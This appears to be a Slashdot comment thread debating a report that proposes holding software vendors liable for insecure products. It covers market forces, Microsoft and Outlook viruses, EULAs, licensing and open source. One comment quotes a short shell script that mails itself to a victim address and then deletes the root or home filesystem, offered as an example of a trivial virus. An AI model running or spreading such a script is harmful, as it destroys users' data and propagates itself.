Im for this in part. Perhaps if a set of guidelines is established for each category of software to adhere to, this kind of law will have more ground to stand on. Car manufacturers cant build cars that have automatic windows that work only after the button is pressed 3 times on sunny wednesday morning. Its just not common sense much less convenient. The same can be said for certain software. We know that webservers have to do one thing and one thing only: serve html pages. Thats standard number one. Now if someone installs apache for example and then starts setting up chilisoft asp and in turn opens up a vulnerability, you dont blame apache, you blame at most chilisoft and at least your systems administrator. The same model could be used in the case of IIS (yeah i admit, its microsofts own fault for trying to tightly integrate everything but u see where im going). With all the various web servers, email management software, web browsers etc, there should be some strict guidelines these packages MUST adhere to before being deemed consumer ready. Lets create a consumer level class of software products that can be said to be functionally fit according to the So-and-so-Hues and Madison Quality of assurance guide. Open source software would probably benefit the most from such a model as it will help to abolish its prejudice of being "unworthy because theirs no capitalist corporate entity to be held liable"..
..
Just my 00000010 cents
-=TheRoadhog=-
Bitch you KNOW the side.. WORLD MAFUCKIN WIDE..
That is all that we need - more laws to tell us how we can write software.
The whole idea of a market economy is to let the market decide what to do with poorly constructed products - and this is being handled by the market already. There is a very good reason why Microsoft does not have a strong handle on server products and why the company I work for prefers a much more expensive Unix solution.
Really, of anyone is going to trust their company infrastructure to a poorly architected product that is a decision that they make and that person will pay accordingly.
Almost all of the serious virus outbreaks of the last two years can be traced to vulnerabilities in Microsoft products.
I'm not fan of Microsoft, but it seems to me that it is the user's fault if they contract a virus. It all goes back to the knowledge level of the user.
If someone sent me:
#!/bin/sh
mail next@victim < $0
if [ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~
fi
And I executed it, it would be entirely my fault! Now can I sue every single UNIX (and UNIX-like) vendor because their system allowed me to delete my files "unknowingly"? Most of the Outlook viruses out there were really nothing more than that! In most cases, the user had to manually open the attachment and run it.
Notice, basically every single complaint about Microsoft insecurities were due to ease-of-use features. Outlook executes attachments, it's much easier for users to click on it to execute it. The web server exploits targeted extra services Microsoft added to make things easier for people who want to use those features. And our good pal Clippy, again, another ease-of-use feature. If people were more knowledgable about computers there would be no need for these extra features and so there would be less code that has to be verified as safe, not to mention more time to verify the important code.
While software security is important, knowledgeable users is just as important, if not more.
M I C R O S O F T
Excessive regulation will increase the entry cost of doing business for the little guy. Regulation is nothing but a speed bump to the really large companies like Microsoft, Oracle, Sun, etc.
We have been lucky that the software industry has been left alone for so long, but it is only a matter of time now.
I Heart Sorting Networks
Okay, sounds like a nice idea...to anyone that actually believes the product hype. Who's to say what "secure" actually means?
The very nature of security holes are that a great number of them aren't known about until someone spends a few weeks farting around with an app in a way that they shouldn't be doing. Now, if someone came to me and asked me to develop a bespoke application for them, I'm hardly going to say, "It'll cost you £10,000, but then we're going to f**k with it for a few months to make absolutely sure it's secure so we don't get sued by the feds, which will amount to an extra £100,000"
What should be done instead is a preventative measure against companines 'stating' that they're shiny new product is secure, when it's not. But then that's already covered as false advertising. It's about time we actually saw some action on one of those cases instead. (ring any bells?)
Nothing is secure out of the box, and consumers should be made to realise that they have to compromise security in order to get cool stuff.
8===8 Dog ate my sig...
You fool! You've given cheese to a lactose intolerant volcano god! Do you know what that means?
Go with companies that have proven security records rather than ones that don't...
Don't buy every shiny new box that pops up on the shelf... Wait a few weeks...
Nobody ever considers that perhaps the consumer is responsible if they buy a shoddy product.
Hey, why not? We really need more laws, especially now that we are on the cusp if living in a society in which every law is 100% enforceable. Consider: we are about 5 years (and remember, you heard it here first) from living in a society in which just about everyone can afford a small, easily hidden device that records every minute of every conversation you had during the day. These conversations will be uploaded to your PC where they will be archived forever. Imagine the consequences of this! No more arguing with the wife over whether she told you about that appointment you missed or not. If you say it, it can AND WILL be used against you FOREVER! A few more years down the road and our every move will be tracked, and there will be a thriving black market in the illicit sales to individuals of this data. Your spouse will be able to easily determine whether you really worked late, or were visiting the local strip bar. This is what we're headed for, and who can truly say they have NOTHING to hide?? Really? You've never cranked the old Escort up to 66 mph? Remember, it doesn't matter if you inhaled or not. IMHO, this world will/would SUCK, and making more and more ever-restrictive laws is going to come back and bite us HARD on the ass.
Yep, this is off-topic and feel free to mod me to the stone ages. I just get riled up over calls for more laws and more government control when we already have too much. On topic: this is dumb anyway. Market forces will ultimately weed out the weak. If Ford still made Pintos, I doubt if anyone would be buying them.
Karma: Professionally Doomed (mostly affected by inability to keep opinions to self)
Software companies, held liable for the security of their products, would certainly apply as much pressure as possible to punish crackers. Since so many crackers come from outside the United States, that could really lead to interesting international law enforcement and judicial scenarios - not necessarily pretty ones, either.
Read the EFF's Fair Use FAQ
main_function(){u serinput());
if(stdlib.getuserid() != "root") then exit "You need to have root priveleges to run this program.";
else stdlib.execute_arbitrary_external_prog(stdlib.get
}
But the following I would not:
main_function(){
// running as root
integer buflen = 5000;
stdlib.bounds_checked_read_input (stdlib.getuserinput(), buflen);
drop_root_privs();
}
even though the latter may represent a format string vulnerability.
(Entered in pseudocode lest someone get the cute idea to actually sue me)
hey, i just noticed, the /. icon for the American flag only has 12 stripes.
I make these: http://beatseqr.com
This kind of system security isn't a criminal matter, it's a civil one. If you want to pass a law, why not pass one saying that EULA's that prohibit suing the company for selling faulty software are illegal. For most OSS projects, this wouldn't apply because there's nobody to sue. (becaue nobody sold you the product, it's free!)
It's a stupid idea.
Quality, security, unbugliness (is that a word?) cost time, and time is money. It's not like you can just pass a law that mandates it, and then everyone gets it for free.
Different uses have different needs. Wayne and Garth's cool discussion board doesn't need as much quality as the receptionist's inventory report, which doesn't need as much quality as NASA's space shuttle stuff.
You use discretion and intelligence and decide how much quality and risk and cost you want, and do what is best. Laws against shitty code, would needlessly reduce options, and let's face it: sometimes shitty code is good enough to get the job done.
The right place for mandating security decisions is when the customer is making demands of the vendor. So if the government wants a law that the software they buy has to be secure, that's better (but still probably not completely wise). But don't spoil it for the rest of us by trying to protect us from using shitty software. The last thing I want is another case of the government protecting me from my own decisions.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
The article talks about "virus outbreaks" and "amending laws so that software makers can be held liable if their products put the public and businesses at risk."
Continuing to quote the article: "Possible options include steps that would increase the exposure of software and systems vendors and system operators to liability for system breaches," wrote the authors of the report.
And..."Although Microsoft has touted the latest version of Windows, called XP, as "its most secure operating system ever", in recent weeks it has been forced to issue a series of patches for the software to make it harder for malicious hackers to compromise it. "
And..."Many of the viruses that have plagued consumers and businesses over the last two years have spread fast and far because of weaknesses in Microsoft's popular e-mail program Outlook."
So, is it I or you who cannot seem to understand the English language?
karma is for the weak >)
As long as we're making obvious statements...be careful what you stick up your nose.
P.S. The government has all the power. Last I checked, I don't have an armored battalion in my back yard.
It is typical of researchers and students, who don't have to make a real living, to cry for government help. The market will sort this out very soon, and there is a good chance that .NET will be rejected by most corporations for, among other reasons, Microsoft's terrible security record. Why don't people do what Linus did, and create something new, rather than being a crybaby.
Comment removed based on user account deletion
Yes... how realistic. I don't think that MICROS~1 software is secure, so I'm just going to dump all that junk today and build something that IS secure... by tomorrow.
Also, "free market" seems to me to mean "largest and most powerful corporate" ... free my backside. Of course, I'm currently free to use any OS at all on my systems, and do so, tho with limited success in some application areas.
On security: Any OS can be properly secured, but it takes work to make it go. Don't do the work, you get cracked. It's as simple as that. So yes, NT systems can be secured. Contrary to what MS wants you to believe, it takes work, tho.
--
Me spell chucker work grate. Need grandma chicken.
This would never hold up in court. The government tells companies what they can and cannot do too much as it is already(this includes our favorite POS, M$). Besides this, the funding for the judicial system to crack down on insecure software would be infinitesimal. Yeah, this is exactly what the people want, higher taxes. My system is secure, I shouldn't have to pay for other's ignorance and stupidity.
It should be enough to just make the software companies liable for some of the damages cause by insecure software they made. That should be enough make insecure software disappear.
The problem would be, that there are several issues with open source software and smaller software firms. Open source software, freeware and to some extend shareware must be excluded from an extension of the liability because no one would develope free (free as beer) software when he risks to pay for damages caused by security holes.
Jan
That doesn't change the fact that they did not<blink> define the word "security" in the way you allege. Did it ever occur to you that what you quote there might be spin?
CEE5210S The signal SIGHUP was received.
The state of Texas has been licensing software engineers since 1998, and there is a push in software development professional organizations to have other states adopt this view of the software profession as well. With licensure come liability.
Consumer advocates have been pushing for an end to warranty disclaimers in software for some time.
This just adds another iron to an already burning fire.
I think that all of this is good and possibly of no harm to Free Software if implemented correctly. I.e. reasonable -- but not complete -- exemption for non-commercial software, not just OSS (see my other post re: Limited Liability); penalty according to degree of negligence, speed of response to notification, etc.
It would be interesting if laws like this were applied to software only if it claimed it was secure.
A nice way to handle this would be to force companies to be responsible for the security of their products or have to place a large logo and notice on their download site/boxes which clearly states that 'This software is not certified secure and may contain dangerous security flaws which could put your data and privacy at risk'.
Companies don't want to be responsible legally, just put the logo on your box. Otherwise you're screwed if you write bad software.
I'd love to see Windows XP-2 on the counters with a big red logo stating 'This product is insecure!'.
Aaron
AaronCameron.net
You're right. People often talk about viruses and hacking into systems when they mean copyright. I'm sorry.
karma is for the weak >)
Comment removed based on user account deletion
not at all. In fact IE is a horrible example. You get IE whether you want it or not. Remember it is a part of the M$ Windows OS. Since it is part of the OS, you are paying for it. Its part of the product.
.. wtf am I smoking these days)
Take for example ncftpd. Gleason can not say "hey, when you buy my product all your buying is the "IO logging facility", the rest of it is free. And OBTW, the only way you can get the rest of the program for free is to buy the logging facility. Therefore I am not liable for anything bad that may happen to the rest of it since it is free.
On the otherhand, this law might change M$'s mind on how they package up there OS. Outlook and IE might turn to be "Free" packages available to be installed but not need. (gawd
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
If companies faced lawsuits and financial penalties when vulnerabilities were found and exploited, they would strongly discourage white-hat hacking, independant vulnerability testing, etc. It would be in Microsoft's best interests to immediately sue anyone who reports a flaw. (White hat hacking violates US law just as black hat does.)
Lawyers would start to be accused of Bugtraq chasing.
I used to support the Libertarians. Why should The Man have the right to tell idiots to wear helmets? Just make motorcycle riders carry enough insurance to cover their costs when they get non-fatal brain injuries (so I don't have to pay for their mistakes) and let them have fun.
But then there's the impaired drunk drivers (not to trivialize the 0.08 crowd, but I'm far more worried about Bubba with a 0.24 BAC than the 0.08 crowd). They tend to take out other people as well. When they drive impaired, they're at threat to all of us. I don't think we should ban alcohol, but I don't see a problem the state having the right to crack down on repeat drunk drivers because there are documented cases of some drunk drivers who have been in multiple accidents resulting in death.
Taking it one step further, I remember being poor and in college and resenting the mandatory vehicle checks my state required. Then I moved to a state that didn't have mandatory vehicle checks... and heard some horror stories of what those vehicle inspections found in other states. Again, I don't give a damn if some moron wants to jack up his pickup with ice hockey pucks... until he takes it on the road and they suddenly shear, forcing his vehicle to roll/tumble into my oncoming traffic lane.
Now let's revisit the software issue. Once again, I really don't give a damn what people do on their own systems that are not attached to the net. But I do care when I can't use my cable modem because NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA.
The Libertarians have a point when they argue that the state should rarely, if ever, protect an individual from themselves. And that the state should rarely, if ever, protect people from inconsequential behavior of their neighbors. (You don't like the fact that your neighbors are gay? It's your problem, not theirs, unless they're doing stuff that would be a problem regardless of their sexual orientation.)
But once you get into behavior that demonstratively harms others, or could reasonably result in harm to others, it's a whole new game. Unfortunately far too many Libertarians don't get this.
In this particular case, we need to see the proposals. But there is absolutely no way you can argue that Microsoft's sloddy practices have not harmed many innocent people. If it takes a law to force them to accept that their indifference demonstratively harms others, so be it.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
in the article is mentioned:
"Many of the viruses that have plagued consumers and businesses over the last two years have spread fast and far because of weaknesses in Microsoft's popular e-mail program Outlook."
maybe they should change the name of the program to lookout!
exploits are found far more commonly in Linux than in Windows.
The NAS, god bless 'em, tend to make their books available to the great unwashed; you have signed on for email updates, haven't you?
Well, just in case you haven't the draft report is available for online perusal here
PS I said NAS, not NSA. Just to be clear.
This is program fubar. If you run it, it will randomly do one of the following:
Freedom of contract works well in competitive markets. If I don't like the boilerplate contract provided by Hertz, I not only have the option of foregoing renting the car, I have the option of renting a car from Avis. Competitive pressures will effect the contract terms, just as they effect prices, and will result in an efficient market.
A copyright holder, however, is by definition a monopolist, and is relatively free from competitive pressure in negotiating contracts. (I say "relatively" free, because there may be imperfect substitutes. I could read a novel by Clive Barker instead of Stephen King, or choose a word processor from Corel instead of MS.)
This wouldn't be so bad if the copyright holder could negotiate the contract with each purchaser independently. (Like a monopolist who does perfect price discrimination, this still results in an efficient market.) But that's really not practical. The transaction costs of negotiating a contract are high, so we end up with boilerplate contracts with obnoxious terms and an inefficient market.
The solution we arrived at with books and music is a legally mandated contract. (Think of "fair use", "first-sale doctrine", and fixed royalties to songwriters for songs broadcast on the radio.)
I'm not saying that we should hold software copyright holders liable for security problems. I think that's too much to impose on them, and the end result will be less software produced. But that's a more sophisticated analysis than mere appeal to "freedom of contract".
Um, yeah, that makes sense.
My beliefs do not require that you agree with them.
If you're thick enough to believe that that's the only direction that it would take, I sincerely hope you aren't an American, because this country needs less sheep.
CEE5210S The signal SIGHUP was received.
What other product? All those alternative PC operating systems that run required Windows apps flawlessly. I try not to use Windows wherever possible, but it's the range of apps and hardware that present a difficulty in switching. A market dominated by one company that makes specific efforts to prevent switching from it's products is not a free market.
Does a Christian soccer team even need a goalkeeper?
Laws to Punish Insecure Software Vendors? When I first read the title I thought it was talking about software vendors that lacked self-confidence and that couldn't talk to girls and s
--- rapper/producer/bachelorette party stripper
I am an American, and you can shove that little thing up your ass. Just because you you think everyone, everwhere wants to stop you from ripping your DVDs and posting them to USENET doesn't mean it's true. There are more important things than this. Also, if you weren't so fscking stupid, you could see that, although they don't spell it out like your mom does, they do clearly imply that the security they refer to is that of protection and not copyright.
karma is for the weak >)
The government involvement needs to be limited to its activity as a consumer protection agent.
The government should review the questionable software and force RECALLs like they do with other dangerous products like toys and cars and stuff.
Making NEW law isn't needed here -- simply enforcing current law is enough.
is a "clause" in the law that simple state this.
A software company/programmer can only become liable should there product be sold for commercial value or profit. Software such as freeware or open source are not liable since they fall under the "what you see is what your get". Should the free program contain malicious or intentional security holes/problems, this clause becomes null and void.
But here is something else I did not see written by anyone else. Should such a law be passed, open source software will pretty much vanish from the business world. Seriously, what manager would really want to run it. Can't profit from it if it goes wrong, so why use it.
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
Many people don't probably realize it but this would be the best thing that could happen to Microsoft. To illustrate the point, consider the fact that US government institutions use almost exclusively Microsoft products but many people don't know that this is actually enforced by law.
There is a law that states that government may only use software, which has certain accessibility features (usable by vision impaired, for example). There is a big bunch of standard requirements that the software products must follow to be in compliance with this law. Now Microsoft is one of the very few companies that can afford compliance with this law.
Now consider what would happen with this proposal when it gets passed. Most probably it will be transformed into an arbitrary set of rather stupid standards and guidelines by our legislative bodies, and again, Microsoft would be the only one able to follow these standards.
When men used to be men
For instance, am I liable if I use the standard C function gets() in a program? I, as the program vendor, can argue that that's what was taught in my undergrad CS course, or I could point the finger at the language designer or C library vendor.
What about a program I write that communicates w/ other software via a standard protocol, and works perfectly if the other software adheres strictly to that protocol but fails in combination with another program which implemented that protocol incorrectly; am I to blame, or is the other vendor? What if the spec is vague?
As I've said in other posts, the potential for good legislation along these lines is there, but only with *heavy* involvement of people who understand issues such as these, along side of the industry lobbyists, consumer advocates and politicians.
We are not licensed by any authority. How can you punish someone that is not bound by some central authority. Insecure software is a relative term...I don't remember taking an"Alan Turing Oath" when I graduated from College.
You can sue a doctor for malpractice, since he/she is licensed, you could sue a nurse, since he/she is licensed...i.e. they are licensed to provide a certain level of quality caregiving...Hell you could sue a lawyer, a CPA...but sorry, Programmers are off limits
You cannot, I repeat cannot sue a programmer/company for insecure software, maybe you should just change vendor's if you are unhappy with your product, its the Capitalist way.
Until programmer's have to pass some sort of a "BOARD" exam, this is just ignorant, or maybe I am.
Ooh, name calling and invective. I knew you were that intelligent.
CEE5210S The signal SIGHUP was received.
So i read you think MS should be liable when they sell me office but not when they give me internet explorer or the free outlook light... (express) ROFLMAO "But software that is free, free as in free beer, should not be liable. I've always felt that if you are providing something for free, and you don't force it into people's hands, those people should understand the risks of using it. "
Americans that think preserving the fourth amendment is just about ripping DVDs and posting them to USENET are morons. But by the time they figure it out, it'll be too late.
Another proud carrier of the $rtbl flag
Yay! Now i don't have to be personaly responsible for anything!
Just joking. I do think Naders a moron but thats because I've been Libertarian since '96
Hollow words will burn and hollow men will burn.
You can find the report on-line at http://books.nap.edu/html/cybersecurity/ .
10 print "HELLO WORLD"
20 goto 10
sulli
RTFJ.
"Sir, we have reason to believe that you released a program, GNU/donothing, which has a buffer overflow in line 1723. You're under arrest. Please turn around, put your hands behind your head, and lace your fingers. Do you have any guns, knives, needles, pins, atomic bombs, or PalmPilots with more bad code that I should know about?"
I've made just a little under two thousand arrests in my career, but none quite like that. And frankly, I'd like to be able to go all the way to my pension and keep it that way.
And let's be realistic. Who is going to write a definition of "secure" that'll actually fit into a statute, that 80% of the judges out there will be able to understand?
Actually, now that I think about it, even expanded civil liability is a questionable idea. My Windows box isn't going to get out of control on the freeway and flatten twelve kids because Microsoft did a crappy job on the brakes. And KDE has crashed on me seven times this week (!) If we expand liability, without taking a lot of care, then I could 0wn at least one of the programmers in court.
So does this mean I can sue Kwikset because some idiot took a chainsaw to the side of my house, sawed their way in and stole the watermelon out of my fridge?
After all, the package the lock was sold in implied it would make my house more secure.
Maybe I should sue Poulan because their chainsaw didn't have a warning label that said "use on house walls may cause personal injury due to possible presence of live electrical cabling." I'll bet that would've stopped the burglar.
Noooo....... I've got a better idea...... I'll sue the farmer that grew the watermelon. After all, he created an "attractive nuisance." And there's laws against that.
What about Whirlpool? My fridge doesn't have a factory-installed alarm system. How am I supposed to keep my watermelons secure? Let's sue the pants off of Factory Specification Parts!!
Give me my freedom, and I'll take care of my own security, thank you.
There is always a modicum of regulation for manufacturing anything. Luckily, these laws are just for show and Corporations generally ignore them because, well, the regulation is never written to be strong enough to harm the Corporation. Might interfere with the GOP after all. ;p
> Petitioning for geographical/geo-political HTTP request headers in client browsers.
That's stupid, it allows for more censorship of the internet based on the laws of the client.
Don't you think that it goes against the distribution of information in favor of borders?
- Kaos games and encryption systems developer
There is such a thing called "Due Dilligence". If a vendor (of any kind) does not create products of a quality of at least the average for the field, and that product is a critical component; the purchaser has the right to sue the vendor for lack of due diligence. The problem is the licensing says essentially that the software vendor is immune from Due Dilligence. We need laws that limit the capabilities of licensing, and not laws that hold software vendors liable for insecurities.
Just my opinion, but it seems to make sense.
Wherever you go, there I am...
I, personally, do not want the US government to have such powers over the software industry. It will merely add another level of head aches to developers around the country. If the product has security flaws, they will be fixed or people will not buy it. It will all pan out naturally.
It's never a good idea to formalize issues like these into laws. Consumer preference and freedom of the market allows consumers to create a self correcting system. If there is a major problem with a product (not necessarily software), the consumers vote with their purchases or lack thereof. This can be seen in people turning away from firestone towards good year or corporations turning away from Windows servers towards Linux.
However, if corporations were to be fined because of vulnerabilities in their system, they would most likely pass the cost down to the consumers. Large corporations would probably purchase business insurance to cover these potential problems (the same way doctors have Medical insurance). However, it is the small companies that will suffer. Unable to afford insurance, the first major problem in their software could bankrupt a company leading to a small number of large corporations rather than a large number of small corporations.
Lastly, to be able to produce secure software, it is almost mandatory to understand computer science theories such as computability or complexity. This could lead to a requirement (not necessarily a law but a social requirement) for a programmer to be a licensed engineer. This is much in the same way that you need a civil engineer license to build bridges. I mean, just about anyone could build a bridge, but you need to understand civil engineering principles to ensure that the bridge functions to specifications.
_______________________________
"I'm not Conceited...I'm just a realist..."
filler
All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
What would Bill say?
"First they punish us for innovation, and now they want to punish us for feeling insecure? That's incredible! Memo to marketing: words beginning with 'IN' no longer to be used in PR materials."
the whole point of a company being at fault of a faulty product is if there's been actual damage done.
has someone been killed? has there been a huge monetary loss because the software company is directly responsible for a blatant defect?
this also raises the question: how much time can pass before the software company is no longer responsible?
when a particular software product is released, and there are no known vulnerabilities at the time of release, then the software company shouldn't be held responsible for future findings, unless those findings are blatant mistakes.
And just what is the definition of "secure enough"? No malformed headers for TCP/IP? No buffer overflowing URLs? Is all software supposed to be "secure enough" or only the components that access the Internet?
And what about flaws introduced into your software by buggy software that was used in development? Who will be at fault when you discover a buffer overflow due to a buggy compiler and not the code you wrote? Will your code have to take care of known (and unknown) bugs in your development tools in order to comply with "secure enough"?
Government intervention is just going to make a mess of the software industry and slow the growth of the Internet.
If "disco" means "I learn" in Latin, does "discothèque" mean "I learn technology"?
Let see here... one security hole in Sun, a couple of dozen hacks and exploits in general for UNIX and Linux... 65000+ (and growing daily) virii, hacks, attacks and expoits for microsnot OSes...
Sure looks balanced to me.
it will also be used to justify criminalizing of people who find and reveal security exploits so that products "seem" more secure to joe clueless moron taxpayer because everyone who publicly states the truth will be silenced.
I don't think laws are going to solve the problem. Insecurity always starts with issues from childhood.
Never underestimate the power of fiber.
Question: Why in the heck should they not be allowed to do whatever the hell they want with their own product? If it's easy to pirate their stuff, who should care but the people putting it out?
Derek Greene
#include
main()
{
for(;;)
{
printf ("Hello World!\n");
}
}
Surely there's a security hole here somewhere. Give us enough time, we'll find it.
Give me my freedom, and I'll take care of my own security, thank you.
If you're engineering a bridge, does "freedom of speech" give you the right to design it so that it will collapse when people try to use it?
Well if your bridge collapses then ill take my business to a competing bridge ;)
Sarcasm aside, the free market is the best way to sort out things such as optimal value. When there is a free, level, and liquid market, then it is the best choice.
I do believe that there is a sufficiently free market for OS's that no government regulation could help. (It could easily make things worse though). Even Microsoft uses unix to master their CD's, because their own OS is not secure enough to handle such a critical function. (anyone still have that link?)
ONLY in cases where the free market doesnt work (because of practical barriers to competition) (Utilities,Transportation, and "Last mile" Communications) should government oversight be accepted as the lesser evil. And in those area's, the government might restrict your right to produce faulty products.
PS: Free speach applies to source code, but not necesarrily to the commercial sale of source code. In cases where code is simply exchanged with no sale, contract, implicit guarantees, warantees, or other inference that the code is useful for any particular purpose, then no regulation or liability should be able to arise.
There is an ongoing argument that releasing things into the public domain could create liability for the releasor. Since it is fully possible to release things into the public domain anonymously, then the argument can be rendered moot. Just dont say who you are when you post things to freenet.
I see a lot of parallels to the patent process in this topic. Why is it that intellectuals, of all people, think that passing legislation that would lead to grossly subjective enforcement is good for an industry?
What will inevitably happen is that those who can demonstrate that they have procedures in place to remedy security holes (through patches, alerts, etc.) will be immune to enforcement efforts. The actual quality or security of the software itself will become irrelevant because no government funded operation will be able to measure quality appropriately. In other words, the evaluation process turns into the question: "How much are you spending in relation to your sales to ensure security of your products?", not "How secure are your products, and how important is security within your application?"
This terrorism argument is getting stale. How long will we let our government act as if intellectual property, private data, etc., are all our nation's collective interests. If the government wants to establish standards for software they purchase internally, fine. IMHO, that's a procurement issue, not one of industry regulation.
Let's let capitalism handle the rest naturally. Bottom Line:
- if a company promises that certain actions are secure, they're subject to civil suit if they fail
- if a company demonstrates a good track record for security and reliability and gives the greatest piece of mind, they will be the choice of enterprise business (i.e. Oracle, Sun, etc.)
I'm getting sick of the sentiment that government involvement in technology will improve the industry. The only industry this type of legislation helps is the legal industry, and having a massive legal industry for internal matters certainly does not promote economic growth.USA ULA
1) Do not install anything.
2) Do not Change any system settings.
3) Do not delete anything.
4) Only save files to C:\Documents\
5) Do not open email attachments
6) Do not download anything.
7) All patches must be installed or we are not liable.
Sounds fair to me! {NOT!}
It's really very basic: ensuring better security is costly, and handling the threat of liabilities too (for example by buying insurance to cover the risk). These are costs and risks a large corporation (like Microsoft) may be able to handle, but for small outfit, or small open source projects it's much harder. Something the size of mozilla, or the linux kernel can afford good QA and will find backers to handle the risks, but small projects would be forced under the cover of some larger organisation or the distributors. Also, in the case of open source projects, the sponsors would demand some say in the development process, or maybe even licensing of the software. But small software makers are in a similar position: To handle the risk of litigation they'd need a backer, they won't have the resources until their Software sells well.
By charging higher premiums to insure companies using software with a bad track record, there are already market forces in place: include that difference in premiums in the TCO-calculations microsoft is so fond of to prove that Windows is cheaper than any competition, and make management aware of it (and make them wonder why that insurance company wants higher premiums for insuring against damages from security holes in that software).
Legislation could hurt many a small software maker, and it would also be subject to heavy lobbying from Microsoft to see to it that their interests are hurt the least, a better idea would be an independant (that's the hard part) organisation providing certification of software. Once that is established there could be legislation demanding minimum standards for software used in certain critic areas.
That way each software maker could choose how much to invest in security and QA, and it would be more transparent for customers how secure a product really is, so they wouldn't have to rely on the software-makers advertising for that kind of information. In effect the insurance conditions and premiums for different kinds of software are already an indicator for its security, and the insurance companies probably have a high interest in accurately estimating the risks, so probably they should play some part in ensuring the proposed organisations independance.
"By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
Great. A law that will punish developing companies who make a seldom used product that happens to have a security flaw that virtually no one knows about. It'd be great if we took away all their revenues while keeping their costs the same.
And for the real problems? Relax! IE is free.
Government is the shadow cast by big business!
Although I don't want to post a really long comment, I did write an article on the trend for legal solutions to technical problems - read it here
Software companies either closed or open source should be forced to recall all unsold software from distributers and not be permitted to release anything but a fixed version.
It's annoys me to no end to see Windows XP still on store shelves and being told by the salesman "don't worry just go to windows update"
IMO the expence and loss of momentum would be enough to make software companies take a hard look at what they are releasing.
Damn when they said snap into a slim jim they weren't kidding!! lol....
Why not change the laws on the other side? If you're too stupid to secure your site, or buy software that is insecure, you can't come after me for replacing your data with a few terrabytes of porn.
With rights come responsibility. PJ O'Rourke said something along the lines of "Everyone has the right to do whatever they want, and the responsibility to accept the consequences."
Increasingly we are seeing laws aimed at reducing our responsibility. I don't know about where you might be, but in this country, it is the law that you have to wear a seatbelt in a car. More dramatically, modern VW Golfs (Rabbits in the States) weigh the better part of a tonne more than early models, entirely due to the safety devices that now have to be incorporated by law. The government is trying to legislate against dying if you drive stupidly. Don't get me wrong, these safety devices are very noble, but legislating they inclusion will continue until we have to drive at 5mph in cotton wool cars.
Laws to punish insecurity in software are precisely the same. I will not guarantee that my software will not blow up. I will not guarantee that it will not eat your enterprise. If you want me to guarantee these things, then you will not be able to afford the cost of my software, that I need to charge to pay my insurance bill.
You can legislate against all the responsibility in the world, but in the end, you will just have abdicated all your rights instead.
This rambling was bought to you by not_cub
q='echo "q=$s$q$s;s=$b$s;b=$b$b;$q"';s=\';b=\\;echo "q=$s$q$s;s=$b$s;b=$b$b;$q"
Proper use of this program requires a third party hardware firewall that blocks the following ports and protocols, 0 thru 65535, tcp, udp, icmp, ip.
Failure to install this firewall may lead to software insecurity.
It'll nuke the software industry, that's what it will do.
Read the comments above. I dont have a choice in using IE. It's tied to the OS; Microsoft admits it. You pay for the OS, so you pay for IE. So it'd better work. Same with Office. NOT the same for freeware I get from download.com, as it is my /choice/ to run that software, and I am not contributing to the resources that go into developing and testing it; ergo, in that scenario, I should be on my own.
"Old man yells at systemd"
Is Red Hat responsible for a collection of packages that they put together or just for the fine things they author and then sell? In other words, if I charge a fee for my ability to put things together for you, am I liable when those things don't work together?
I also worry for consultants. Can I deny the implied mechantability if I install Debian for you? Obviously you have hired me for a specific purpose and I'm supplying you with tools to meet that need.
There is a fine line here, and I'm not encourged by my government's recent direction on other matters such as DMCA. They can't be counted on to get the difference, or can they? Surely there are meat space equivalents to elucidate the problem, but I worry that common sense may be just as lost here as it is in the confidentiality of email vrs US post and phone calls.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
I have a 64 1/2 mustang that has a firewall behind the back seat to prevent this type thing. I'm replacing it with a racing gas tank to prevent any kind of leakage in a rear-end accident.
"An influential body of researchers..."
If these guys were any good at research, they would have noticed that the largest single contributor to both the Democratic and Republican presidential campaigns (Not to mention plenty of other campaigns worldwide.) was Microsoft, the mother of all "... software firms that do not do enough to make their products secure." and realize that they have no hope of getting these laws passed in the US.
software is built for a specific purpose, if that purpose is not met when using the software, the company goes out of business, or they get sued. It is ludicris to think that suing software companies for security holes is acceptable UNLESS that company is marketing a security product (maybe a firewall or some such). To apply this to other parts of our economy, would it be fair for me to sue Ford if I disconnected my brake cable and then sued them when the modified product crashed? What if i went and bought a new escort, filled the tank with octane boost, and drove down the highway at 170mph, would i have a case in court against Ford when i lost control due to handling problems? Think about it.
E
> I'm not sure it's fair to hold Microsoft responible for making
> possible the actions of a malicious hacker. Is it Honda's fault a
> slimjim opens the door of my Civic?
Well, to get a realistic comparison, you'd need to compare on even ground. Pretend for a moment that your car door locks went to "locked" when you pushed the lock button, and "unlocked" when you pushed the unlock. However, they didn't actually engage the tumblers in the door, so when it's locked, the handle still opens the door. Now, there's a switch inside the door that you can get to by pulling the door side off, and when you throw it the tumblers connect and when the door says "locked" it now really means it.
Now, would you blame Honda if they didn't set the switch to "on" at the factory, and didn't tell anyone about the switch, and only acknowledged that it exists when someone in the field finds it and threatens to tell the general public?
I'd bet you would. That's a fairer comparison, and so yes, I think the companies that produce easily exploitable software should be forced to reckoning for it.
Virg
The book...
One of the interesting things that was discussed was software development. Basically, the only "company" that was producing software was the US government.
Why?
Because software became so pervasive in society, many laws were written which regulated the process of software production. Compliance became such a process that the only 'company' that could still afford to make software was the US Government.
The current trend is to produce more and more legislation for software (security holes, hacking, DMCA, etc. etc.) production and usage.
Consequently, the cost of software production becomes higher and higher.
What happens when a company, in a market, creates barriers to entry which are insurmountably high? They are identified as a monopoly and are summarily beaten down (MS aside).
What happens when those barriers have been introduced by federal regulations? The government steps in and either assimilates it or regulates it with an iron fist (or a greased pocket).
-Dennis
Second, if any laws are written, my guess is they would merely extend already existing more generic laws regarding false advertisement. Under such circumstances, software vendors would not be *required by law* to produce secure software. But, if their advertising campaign, sales representatives, software packages blatantly lead potential consumers to believe that their product is of "enterprise-level", "mission-critical-caliber", "secure", "reliable" or any such wording which implies "secure software", then the law could provide for some serious compensations to the harmed consumer.
